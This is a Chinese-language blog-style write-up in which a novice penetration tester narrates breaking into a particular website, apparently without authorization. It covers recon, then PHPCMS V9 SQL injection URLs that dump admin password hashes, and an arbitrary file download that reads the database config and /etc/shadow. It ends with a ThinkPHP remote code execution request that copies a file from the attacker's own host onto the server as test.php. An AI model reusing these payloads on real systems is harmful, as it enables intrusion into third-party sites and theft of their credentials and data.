0X01 前言
這是剛剛開始學習滲透的一個目標吧 這個站從剛開始學的那一天起,就想把他日下來。
可能是自己的信息收集能力太差了吧,導致一直無從下手 沒有進展。這是需要慢慢積累的過程。還需努力學習。
0X02小白滲透
在剛剛開始的時候,一頓亂掃 什么子域名 C段 旁站 端口 ip 服務 目錄 指紋 waf都照着網上的方法做,但是你不知道你掃這些干嘛,掃下來又有什么意義吶?
這是我對這些的理解 如有不足希望多多交流
1旁站 旁站就是同一ip上面的不同的站 比如iis 下面有兩個www.xxx.xom和www.xxx2.com 這就互稱為旁站 你拿下其中任意一個另外一個就是你的了 但是如果開了其他服務 那么就不能再80端口占用 2C段 假如你的ip是192.168.1.1那么192.168.1.1-254都屬這個段內 這就是C段 ,一般很難入侵,思路有內網下面的各種未授權訪問入侵 3端口 看對應端口開放了那些服務 找漏洞 4指紋系統 快速准確的識別網站語言,cms等等 不用你去嘗試 浪費時間 5waf識別 sqlmap的參數 python2 sqlmap.py -u "https://www.example.com" --identify-waf --batch 或者用Wafw00f 這個工具
6目錄
敏感目錄
從剛開始學習滲透的時候思路 找注入點 注入登陸后台拿shell 當時也只會找id=1這些位置的地方的參數然后扔到sqlmap里面一頓亂掃
當然 這個站是不可能有id=1這些這么粗俗的注入點的
然后 就......找不到 然后robots里面看見了很多東西 但是也只看見一個admin.php 然后什么思路都沒有 就這樣 就放着放着 心想慢慢學吧 總會拿下的。
0X03開始有點入門了
指紋 知道了phpcms Google 搜索一波phpcmsV9 getshell
有一個前台直接getshell???
http://ximcx.cn/post-126.html 這里西門老師講的很清楚
但是我們的站不開放注冊功能 沒有前台用戶 甚至這可能是一個自己改版的phpcms
那么前台直接getshell無果后 還有一個注入
第一步 得到用戶認證cookie
/index.php?m=wap&c=index&a=init&siteid=1
第二步
userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4 傳給userid_flash
並且構造你的sql語句
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+password+from+v9_admin+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26
這里要編碼 然后得到返回穿參給第三步
第三步
/index.php?m=content&c=down&a_k=
發包 updataxml報錯注入
進行這個站點的測試兩天了 框架PHPCMS V9 1思路 注入點是root 寫shell 知道路徑 可以用union聯合寫 但是 遇到問題說 1、限制mysqld 不允許導入 | 導出 --secure_file_prive=null 2思路二 堆疊注入 在admin表里面加入我自己的用戶 但是堆疊注入不可用 3 8080開放WDCP弱密碼爆破無果 爆破了一波目錄 沒有什么可用的價值 4利用注入點 讀取wdcp賬戶密碼 但是 phpcmsv9這里用的是updataxml報錯注入 SELECT * FROM `網站的v9數據庫名`.`cd_download_data` WHERE `id` = '' and updatexml(1,concat(1,((select passwd from wd_member where table_schema=wdcpdb limit 0,1))),1)#' LIMIT 1 MySQL Error : Table '網站的v9數據庫名.wd_member' doesn't exist 這里報錯只能在網站庫里面查詢 我思路少 求指教 也無果 5希望師傅們多多交流 ,小白我太難了
這是我當時在T00ls的求助 這里面都是我所遇到的問題 所以從注入點上手也得放棄
思路三 phpcmsV9.2任意文件下載 雖然沒開外連 但是心想 我把他數據庫密碼 和ssh密碼讀取出來 xshell直連 或者拿這些密碼去碰撞一下后台的密碼也是行的啊
這里遇到問題了 由於服務器是kali不是windows 但是這個cms過濾了php的文件下載 我們構造文件名需要讓liuxn解析成php這里我的構造方法
phpcms過濾*和/\ 我們再本機上面測試 1.php空格 1.php*都可以被當成我們的1.php解析 但是這里我構造1.php*不知道為什么不行 試了好久1.php空格才行的
http://www.ccc.com/index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=.%2*fcaches%2*fconfigs%2*fdatabase.php%2*520%2526modelid%3d1%2526d%3d1%26aid%3d1
index.php?m=content&c=down&a=init&a_k=
第一個下載的文件 當然是數據庫配置文件 查看密碼 然后弱口令撞密碼
第二個讀取的是/etc/shadow/然后hash跑密碼 但是無奈 跑出來了 但是22端口不對外開放 。。。
看網上說auth_key好像有點用 於是嘗試行的讀取一下 結果就是這個嘗試 轉變就到來了 讀出了一個旁站!!!!!!!!!!!!!!!!!!!
都懂了吧 這個用其他旁站掃描工具掃描的時候 沒掃出來
然后TK遠程代碼執行 這里也是試了很久 ban了很多函數 只能執行phpinfo最后直接用簡單粗暴的方法
http://xxxx/?s=captcha&Fuck=copy("http://你的ip/50.txt","test.php")
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=Fuck
最后 終於 終於
學習之路 少就是多 慢就是快